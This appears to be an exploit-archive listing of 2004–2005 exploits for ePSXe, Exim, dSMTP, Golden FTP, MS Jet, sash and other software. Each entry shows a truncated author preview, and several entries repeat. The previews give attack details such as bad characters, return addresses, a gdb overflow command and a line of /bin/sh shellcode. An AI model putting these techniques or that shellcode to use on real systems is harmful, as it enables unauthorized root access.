ePSXe 1.6.0 - nogui() Local Privilege Escalation

ePSXe 1.6.0 - nogui Local Privilege Escalation / epsxe-e.c ePSXe v1. local exploit By: Qnix e-mail: q-nixathotmaildotcom ePSXe-website: www.epsxe.com EXP-Sample: root@Qnix:/epsxe gcc -o epsxe-e epsxe-e.c root@Qnix:/epsxe ./epsxe-e ePSXe v1. local exploit by Qnix | Q-nixathotmaildotcom Stack point...

Exim 4.41 - dns_build_reverse Local Read Emails

Exim 4.41 - dnsbuildreverse Local Read Emails / ripped straight off iDEFENSE advisory - so lazy I just picked up GDB... bored on a weeknight : nothing to write home to mother about due to the fact that you need a local user account on a server and all you get is to read other people's emails...

Exim 4.41 - 'dns_build_reverse' Local Read Emails

/ ripped straight off iDEFENSE advisory - so lazy I just picked up GDB... bored on a weeknight : nothing to write home to mother about due to the fact that you need a local user account on a server and all you get is to read other people's emails .... not even my own shellcode. aleph1 shellcode -...

dSMTP Mail Server 3.1b Linux Remote Root Format String Exploit

No description provided by source. / dSMTP - SMTP Mail Server 3.1b Linux Remote Root Format String Exploit cybertronicatgmxdotnet 05/05/2005 This exploits the "xtellmail" command! bindc0de breaks somehow, cb works fine! remote buffer space is about 256 bytes bad chars: 0x00, 0x20, 0x0a and prolly...

dSMTP Mail Server 3.1b (Linux) - Format String

/ dSMTP - SMTP Mail Server 3.1b Linux Remote Root Format String Exploit cybertronicatgmxdotnet 05/05/2005 This exploits the "xtellmail" command! bindc0de breaks somehow, cb works fine! remote buffer space is about 256 bytes bad chars: 0x00, 0x20, 0x0a and prolly more NOTE: before you start, chang...

Solaris 10.x - ESRI Arcgis Format String Privilege Escalation

Solaris 10.x - ESRI Arcgis Format String Privilege Escalation / ESRI 9.x Arcgis local root format string exploit Copyright Kevin Finisterre and John H. Bug found by Kevin Finisterre Exploit by John H. We overwrite the thrjmptable Tested on solaris 10 / include include include include include...

Solaris 10.x - ESRI Arcgis Format String Privilege Escalation

/ ESRI 9.x Arcgis local root format string exploit Copyright Kevin Finisterre and John H. Bug found by Kevin Finisterre Exploit by John H. We overwrite the thrjmptable Tested on solaris 10 / include include include include include include include include include define VULPROG...

Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)

No description provided by source. / \ golden ftp 2.52.0.0 remote r00t exploit / \ remote r00t exploit binds 4444 port on remote machine. / tested on: winxp sp0 rus \ / simple stack overflow in golden ftpd. \ if retaddr isn't right, ftpd will crash, and admin will be in big shit / 'coz ftpd won't...

Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)

/ \ golden ftp 2.52.0.0 remote r00t exploit / \ remote r00t exploit binds 4444 port on remote machine. / tested on: winxp sp0 rus \ / simple stack overflow in golden ftpd. \ if retaddr isn't right, ftpd will crash, and admin will be in big shit / 'coz ftpd won't start later ; \ / code to be...

Snmppd SNMP Proxy Daemon Remote Format String Exploit

Exploit for linux platform in category remote exploits ===================================================== Snmppd SNMP Proxy Daemon Remote Format String Exploit ===================================================== / Snmppd SNMP proxy daemon format string exploit cybertronicatgmxdotnet 04/29/20...

MySQL MaxDB Webtool 7.5.00.23 - Remote Stack Overflow

MySQL MaxDB Webtool 7.5.00.23 - Remote Stack Overflow / MySQL MaxDB Webtool Remote Stack Overflow Exploit cybertronicatgmxdotnet 04/27/2005 / / / / / / / / / / / / / / / / / / / // // / // / / / / // / / // / / / / / / /, /./// // // //// // -- exploit by : cybertronic -...

Yager 5.24 - Remote Buffer Overflow

/ Yager 1 -- sending handshake UDP...done! -- reading server response UDP...done! -- server port: 1089 -- connecting to 192.168.2.100:1089 TCP...done! -- exploiting WinXP Pro SP1 GER -- ret: 0x300686bd jmp esp in binkw32.dll -- exploiting packet overflow... -- sending packet...done! -- starting...

CrystalFTP Pro 2.8 Remote Buffer Overflow Exploit

No description provided by source. / CrystalFTP Pro v2.8 Buffer Overflow Exploit 04/25/2005 despite the fact that nobody uses CrystalFTP i had to release a new version that replaces the first one. this overwrites the structured exception handler with a "pop edx pop eax ret" in kernel32.dll. this...

MS Jet Database (msjet40.dll) Reverse Shell Exploit

Exploit for unknown platform in category local exploits =================================================== MS Jet Database msjet40.dll Reverse Shell Exploit =================================================== Microsoft Jet msjet40.dll Reverse Shell Exploit Based on the exploit written by S.Pears...

WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow

WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow / WheresJames Webcam Publisher Beta 2.0.0014 POC www.wheresjames.com Bug and Exploit by : Miguel Tarascó Acuña - Haxorcitos.com 2005 Tarako AT gmail.com - Tarako AT Haxorcitos.com Platforms tested: - Windows 2000 SP4 Spanish -...

gld 1.4 (Postfix Greylisting Daemon) Remote Format String Exploit

Exploit for linux platform in category remote exploits ================================================================= gld 1.4 Postfix Greylisting Daemon Remote Format String Exploit ================================================================= / 0x82-meOw-linuxerforever - gld 1.4 remote...

MS Jet Database (msjet40.dll) Reverse Shell Exploit

Exploit for unknown platform in category local exploits =================================================== MS Jet Database msjet40.dll Reverse Shell Exploit =================================================== See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll...

MS Jet Database (msjet40.dll) DB File Buffer Overflow Exploit

Exploit for unknown platform in category local exploits ============================================================= MS Jet Database msjet40.dll DB File Buffer Overflow Exploit ============================================================= / -------------------------------------- Microsoft Jet...

sash 3.7 - Local Buffer Overflow

/ sash-3.7 buffer overflow in c argyment written by lammat for practice purposes http://grpower.ath.cx [email protected] gdb r -c perl -e 'print "A"x10256' The program being debugged has been started already. Start it from the beginning? y or n y Starting program: /sbin/sash -c perl -e 'print...

sash <= 3.7 Local Buffer Overflow Exploit

Exploit for linux platform in category local exploits ========================================= sash include include static char shellcode= "\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; define NOP 0x90 define LEN 10256...